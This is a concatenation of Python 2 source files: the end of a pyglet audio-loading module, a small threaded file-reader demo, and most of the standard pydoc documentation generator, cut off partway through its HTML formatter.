`streaming` : bool
If False, a `StaticSource` will be returned; otherwise (default) a
`StreamingSource` is created.
:rtype: `Source`
'''
source = get_source_loader().load(filename, file)
if not streaming:
source = StaticSource(source)
return source
def get_audio_driver():
global _audio_driver
if _audio_driver:
return _audio_driver
_audio_driver = None
for driver_name in pyglet.options['audio']:
try:
if driver_name == 'pulse':
from drivers import pulse
_audio_driver = pulse.create_audio_driver()
break
elif driver_name == 'openal':
from drivers import openal
_audio_driver = openal.create_audio_driver()
break
elif driver_name == 'directsound':
from drivers import directsound
_audio_driver = directsound.create_audio_driver()
break
elif driver_name == 'silent':
_audio_driver = get_silent_audio_driver()
break
except Exception as exp:
if _debug:
print 'Error importing driver %s:\n%s' % (driver_name, str(exp))
return _audio_driver
def get_silent_audio_driver():
global _silent_audio_driver
if not _silent_audio_driver:
from drivers import silent
_silent_audio_driver = silent.create_audio_driver()
return _silent_audio_driver
_audio_driver = None
_silent_audio_driver = None
def get_source_loader():
global _source_loader
if _source_loader:
return _source_loader
try:
import avbin
_source_loader = AVbinSourceLoader()
except ImportError:
_source_loader = RIFFSourceLoader()
return _source_loader
_source_loader = None
try:
import avbin
have_avbin = True
except ImportError:
have_avbin = False
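# Illustrative usage sketch, not part of the original module: the typical
# high-level flow described in the module docstring.  'background_music.wav'
# is a hypothetical file name and a working audio driver is assumed; the
# function is defined but never called at import time.
def _playback_usage_sketch():
    music = load('background_music.wav', streaming=False)
    player = Player()
    player.queue(music)
    player.play()
    return player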
|
data_reader2.py
|
import os
from Queue import Queue, Empty
import sys
from threading import Thread
import time
class DataReader(object):
"""DataReader - simple data reader"""
def __init__(self, num_worker_threads=5):
super(DataReader, self).__init__()
self.num_worker_threads = num_worker_threads
def read_data(self, filenames):
input_queue = Queue()
for item in filenames:
input_queue.put(item)
output_queue = self.process_queue(input_queue)
output = []
while not output_queue.empty():
output.append(output_queue.get())
print(output)
def process_queue(self, input_queue):
output_queue = Queue()
total = input_queue.qsize()
        def worker():
            while True:
                # get_nowait() avoids the race between an empty() check and a
                # blocking get() when several workers drain the same queue.
                try:
                    item = input_queue.get_nowait()
                except Empty:
                    break
                current = input_queue.qsize()
                sys.stdout.write('\rprocess(%d/%d): %s...' % (total - current, total, item))
                sys.stdout.flush()
                with open(item) as f:
                    data = f.readlines()
                    output_queue.put((item, data))
                input_queue.task_done()
                time.sleep(1)  # sleep 1 second to see the flush demo
for i in range(self.num_worker_threads): # start threads
worker_thread = Thread(target=worker)
worker_thread.daemon = True
worker_thread.start()
input_queue.join() # block until all tasks are done
print
return output_queue
def main():
data_dir = 'tmp/'
filenames = [os.path.join(data_dir, f) for f in os.listdir(data_dir) if f.endswith('.txt')]
print(filenames)
dr = DataReader()
dr.read_data(filenames)
if __name__ == '__main__':
main()
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
result = _encode(result)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
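# Illustrative sketch, not part of the original pydoc module: splitdoc()
# separates the synopsis line from the body when they are divided by a blank
# line.  The docstring below is an arbitrary example.
def _splitdoc_sketch():
    doc = 'One-line summary.\n\nLonger description\nspanning two lines.'
    synopsis_line, body = splitdoc(doc)
    assert synopsis_line == 'One-line summary.'
    assert body == 'Longer description\nspanning two lines.'
    return synopsis_line, body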
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
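# Illustrative sketch, not part of the original pydoc module: cram() keeps the
# head and tail of an over-long string, and stripid() removes the trailing
# hexadecimal id from an object repr.  The inputs are made-up examples.
def _cram_stripid_sketch():
    assert cram('abcdefghijklmnopqrst', 11) == 'abcd...qrst'
    assert stripid('<foo.Bar instance at 0x7f3a2c1d9b50>') == '<foo.Bar instance>'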
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
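# Illustrative sketch, not part of the original pydoc module: visiblename()
# hides a fixed set of special names and any single-underscore name that is
# not explicitly exported via __all__.
def _visiblename_sketch():
    assert visiblename('__len__') == 1            # special names are shown
    assert visiblename('__builtins__') == 0       # except the hidden set
    assert visiblename('_private') is False       # private names are hidden
    assert visiblename('_private', all=['_private']) is True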
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- Unicode support helpers
try:
_unicode = unicode
except NameError:
# If Python is built without Unicode support, the unicode type
    # will not exist.  Fake one that nothing will match, and make
    # the _encode function a no-op.
class _unicode(object):
pass
_encoding = 'ascii'
def _encode(text, encoding='ascii'):
return text
else:
import locale
_encoding = locale.getpreferredencoding()
def _encode(text, encoding=None):
if isinstance(text, unicode):
return text.encode(encoding or _encoding, 'xmlcharrefreplace')
else:
return text
def _binstr(obj):
# Ensure that we have an encoded (binary) string representation of obj,
# even if it is a unicode string.
if isinstance(obj, _unicode):
return obj.encode(_encoding, 'xmlcharrefreplace')
return str(obj)
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
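# Illustrative sketch, not part of the original pydoc module: synopsis()
# returns the first docstring line of a module file.  A throwaway module is
# written to a temporary file here purely to demonstrate the call.
def _synopsis_sketch():
    import tempfile
    handle, path = tempfile.mkstemp(suffix='.py')
    os.write(handle, '"""A one-line summary.\n\nDetails follow."""\n')
    os.close(handle)
    return synopsis(path)    # -> 'A one-line summary.'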
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
        return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return _encode('''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta charset="utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents), 'ascii')
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;')
def section(self, title, fgcol, bgcol, contents, width=6,
                prelude='', marginalia=None, gap='&nbsp;'):
"""Format a section with a heading."""
if marginalia is None:
            marginalia = '<tt>' + '&nbsp;' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
                             ' ', '&nbsp;', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
                url = escape(all).replace('"', '&quot;')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(_binstr(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(_binstr(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(_binstr(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
